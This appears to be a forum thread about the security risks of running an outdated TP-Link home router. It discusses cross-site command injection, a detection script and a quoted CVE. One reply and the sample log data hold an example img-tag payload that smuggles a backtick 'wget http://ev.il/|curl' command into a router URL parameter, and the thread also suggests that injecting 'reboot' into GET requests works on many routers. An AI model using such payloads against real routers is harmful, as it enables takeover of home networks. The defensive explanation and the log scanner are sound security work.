by von_tenia 1919 days ago
I'm using a 7-year-old TP-Link wifi router; the last official firmware available is from 2018. I disabled features like remote administration and file-sharing. I also set up WPA2, disabled WPS and have a strong password on the admin. What is the real risk for me? I get that it is always preferable to have an up-to-date device for security, but I also wish to not create more electronic waste (and I unfortunately have stability issues with OpenWRT). From my understanding, cracking a WPA2 passphrase isn't as easy as it used to be with WPA1 or WEP, and not having the admin interface exposed to the outside world limits the risk of someone breaking in. So realistically, assuming I'm not targeted by some APT group, would breaking into my router be that easy?
2 comments

It depends. If there's a vulnerability in the firmware that allows unauthenticated code execution from a generic GET request, malvertising on your computer could load an IMG tag with the SRC set to your router's IP and deploy malware to your router. From there your router could become part of a botnet, the router's DNS settings could be changed to redirect websites through some malvertising DNS server, and whatever the router can access in your network (dev database server?) could be extracted. Sometimes all it takes is an <img src="http://10.1.1.1/admin/getSettings?command=`wget http://ev.il/|curl`" /> in an ad.

Such vulnerabilities are more common than most vendors would like to admit. Adding `reboot` to random GET requests gets you quite far with quite a lot of consumer routers. I have little experience with TP Link software outside of flashing OpenWRT on their hardware.

There have already been scanners that target specific ISP routers for specific ISPs in specific countries. In practice the probability of getting hit like this is very low, but the risk is still there.

With four years of updates, TP Link might actually care enough about security to not allow trivial exploits to execute code on their routers. Many vendors I know won't update past a year or two. I'd say the risk is low to very low in practice, but I'd watch out with running sensitive services (if you're in a healthcare startup, for example) while working from home.
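A defender-side illustration of the cross-site GET path described in the comment above, added here and not part of the thread: it scans constructed router access-log lines for the two tell-tales, a query value carrying shell metacharacters and a state-changing request whose Referer is not the router itself. The log format, the router address and the endpoint names are assumptions.

```python
"""Flag GET requests to a router admin interface that look like cross-site
command injection. Added example; log lines and endpoint names are constructed."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines: client, request line, referer (simplified combined log).
SAMPLE_LOG = [
    '192.168.0.10 "GET /admin/getSettings?command=%60wget%20http://ev.il/%7Ccurl%60 HTTP/1.1" "http://ads.example/page"',
    '192.168.0.10 "GET /admin/status.htm HTTP/1.1" "http://192.168.0.1/admin/index.htm"',
    '192.168.0.12 "GET /cgi-bin/reboot HTTP/1.1" "-"',
    '192.168.0.10 "GET /admin/wlan?ssid=MyHome%20Net HTTP/1.1" "http://192.168.0.1/admin/wlan.htm"',
]
ROUTER_HOST = "192.168.0.1"  # assumed LAN address of the admin interface
LOG_RE = re.compile(r'^(\S+) "(\w+) (\S+) [^"]*" "([^"]*)"$')
SHELL_META = re.compile(r'[`;|&$]|\$\(')  # backtick, pipe, chaining, $(...)
STATE_CHANGING = ("reboot", "restore", "setPassword", "setDns")  # assumed endpoints


def analyze_line(line):
    """Return {'client', 'path', 'reasons'} for a parsable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, referer = m.groups()
    url = urlsplit(target)
    reasons = []
    # parse_qsl decodes once; unquote again so double-encoded payloads also surface.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if SHELL_META.search(unquote(value)):
            reasons.append(f"shell metacharacters in {key}")
    # A request the browser was steered into from another site carries that site's Referer.
    ref_host = urlsplit(referer).hostname if referer != "-" else None
    if ref_host is not None and ref_host != ROUTER_HOST:
        reasons.append(f"cross-site referer {ref_host}")
    # State-changing endpoints should only ever be reached from the router's own pages.
    if any(tok in url.path for tok in STATE_CHANGING) and ref_host != ROUTER_HOST:
        reasons.append("state-changing path without same-origin referer")
    return {"client": client, "path": url.path, "reasons": reasons}


def scan(lines):
    """Keep only the lines that raised at least one reason."""
    return [r for r in map(analyze_line, lines) if r and r["reasons"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["path"], "; ".join(hit["reasons"]))
```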

Yes, but:

Consumer routers all have security holes that can be exploited even when you do everything correctly like you did.

https://www.cvedetails.com/vulnerability-list/vendor_id-1193...

Looking at this one:

    TP-Link TL-WR940N is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the ipAddrDispose function. By sending specially crafted ICMP echo request packets, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges.

Your only safe(ish) bet is to build your own, and hope that Linux/BSD close all the exploits that get discovered.